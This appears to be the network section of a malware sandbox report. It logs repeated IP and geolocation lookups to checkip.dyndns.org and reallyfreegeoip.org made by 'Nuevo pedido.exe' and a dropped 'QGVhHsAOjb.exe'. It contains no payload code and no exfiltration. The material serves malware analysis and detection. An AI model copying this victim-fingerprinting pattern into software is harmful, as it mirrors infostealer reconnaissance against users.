Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49764	193.122.130.0	80	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:12.913570881 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:13.371639013 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bd0d85edaac974771c221146fc1b4958 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49767	193.122.130.0	80	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:14.242419004 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:14.719979048 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3502b8fd07b68db523824b354b6368b2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49772	193.122.130.0	80	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 16:36:15.349977970 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 16:36:16.082178116 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a74714220f662eed99555c76c647a0a9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	104.21.16.1	443	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:02 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 15:36:02 UTC	869	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:02 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751751 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CGWdhXdn2z6XAmwxYTtq%2Bf%2F3hnLIaUyT28WPvcTMUuJGmqQmF%2F2zQ6ELnMBqgiFtmccAaEhl5AeH5wN4Ar40K%2BQSoYT%2FMA%2Ba%2F58XJ1CT%2Fok8K%2FoCi1ufVMMQC5%2Fx10eEELe6BUDz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff58028fe9f4388-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1616&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1801357&cwnd=221&unsent_bytes=0&cid=c3545eb3b928a80f&ts=668&x=0"
2025-01-09 15:36:02 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	104.21.16.1	443	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:04 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 15:36:04 UTC	864	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:04 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751753 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZEjoQ0Zt2CJlWFEd1e46tlHLl6a41D94J%2FevSS9gaNUMyvIvct%2B96zYLqJOg%2B7jcX8NfWMFe7lfq%2FJI76%2B0kBIZ%2FZcV7BDWJUZBms3XMda6eQq4uZ7qj7%2B8GTaGUbbyNJ1C7TGP9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff58034ec650fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9648&min_rtt=1534&rtt_var=5524&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1903520&cwnd=252&unsent_bytes=0&cid=800df69f630f117e&ts=160&x=0"
2025-01-09 15:36:04 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	104.21.16.1	443	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:05 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 15:36:05 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:05 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751754 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T5gvm6QCLGGyrOLA9rqvcsip2g%2F2He4MeHPm5r%2FypAqGcYon2nbKkGJclU1jqOQuGZ9ayNRot%2FZs%2Bo6B3oDgcOH5LqWvUWWNSjDPXZFmqzIu1AqS6V11RoAxm%2Fl0fjUQuNuwPgBH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff5803bfb2341ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1598&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1745367&cwnd=192&unsent_bytes=0&cid=bcca67b1aad8fb2e&ts=191&x=0"
2025-01-09 15:36:05 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	104.21.16.1	443	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:06 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 15:36:07 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:06 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751756 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35thszIA6aeURvZ5EAIJeBiDERiHcvw57kgm%2B0ZlhEDlxE6vtemsZpN6m0d%2FFGmb6PHmnfp4A5THsf%2BEQ98bLNoLtErwAA0wlaXvufH0Q0lngCg5%2FeKg2awyukC64ctNkF2CWsuA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff580436f978ce0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1793&rtt_var=686&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1579232&cwnd=211&unsent_bytes=0&cid=d95d8a4b435a2e15&ts=167&x=0"
2025-01-09 15:36:07 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	104.21.16.1	443	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:06 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 15:36:07 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:07 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cf-Ray: 8ff58043b9411899-EWR Server: cloudflare Age: 1751756 Cache-Control: max-age=31536000 Cf-Cache-Status: HIT Last-Modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y0iaFlDZOshv72UX6XrY5b6yJ9KSGLGjbP4NRJFoH0i6kd0VjAPykpFz6ZbN8YdqruqWmGQE6DAwm%2BkNN7FQz1C6REvAbpTqQdRTSA%2Fj6FY0oNRQmFe5dnUGA4gXC0%2FiHYf4MDN9"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1619&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1792510&cwnd=153&unsent_bytes=0&cid=a82a5770c2f14008&ts=319&x=0"
2025-01-09 15:36:07 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	104.21.16.1	443	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:07 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-09 15:36:08 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:07 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751757 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UAu2ZdA63BHLAmMX2kuPLeIt44tlD4GOzd%2BqDtxxGr2s2TZ6WVgj32kBG4vYKW%2FOvMZnwiR67JA83B3XPByZJssoERFy4dZOOyOhQ04zFKrseRTz2MasFTEPjuxqPiFv7FzZFLvC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff580492a1d0fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1459&rtt_var=560&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1929940&cwnd=252&unsent_bytes=0&cid=91250f45b3ec9627&ts=144&x=0"
2025-01-09 15:36:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	104.21.16.1	443	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:08 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 15:36:08 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751757 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2hvSu2tq8U17HL7vkCGty9THxtJnTjyvs50MUPGRLm5w05hsev%2FtphEqQ6dkoy9lt6AMyuBhecdZTL4Re4ibVrzaRUaHE5YRXYEb%2BMcN9EEKNYQQwmxGjmdXl514%2BsXi4jPO5jZM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff5804b6a838ce0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1806&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1616832&cwnd=211&unsent_bytes=0&cid=01aac611eb89df37&ts=271&x=0"
2025-01-09 15:36:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	104.21.16.1	443	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:09 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 15:36:09 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:09 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751758 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aGbDZeH12LXGqgatYhcpJloB09902gPQHNccDnZrw9ODRwHgMbr%2Ft83kSs%2FEfu6FKQmmrT8aAajjKkF0dFfww68c9EgOJD%2FUAuzps3xBH5JnVLkIIvd%2BQ8ye6umbRIZOy4fYr8%2FX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff580517abd0fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1476&rtt_var=561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1938911&cwnd=252&unsent_bytes=0&cid=22baa965853323a4&ts=153&x=0"
2025-01-09 15:36:09 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	104.21.16.1	443	7764	C:\Users\user\Desktop\Nuevo pedido.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:09 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 15:36:09 UTC	869	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 15:36:09 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1751758 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FoCxulYdx6PzNKhjI%2FxRe1CBl8B6FSgezB0Rd8C46wan3%2FfKnX%2BEdr8D%2B0l27%2Byo6%2BxUM5T5FfVWhBoRepc7u5wkjX%2BimAhalk01z%2FkgaA48DhW5dvNfQGEVaauhR0vm%2FtuIP7xl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff580523d218ce0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1814&rtt_var=694&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1561497&cwnd=211&unsent_bytes=0&cid=f5610d274407d81a&ts=139&x=0"
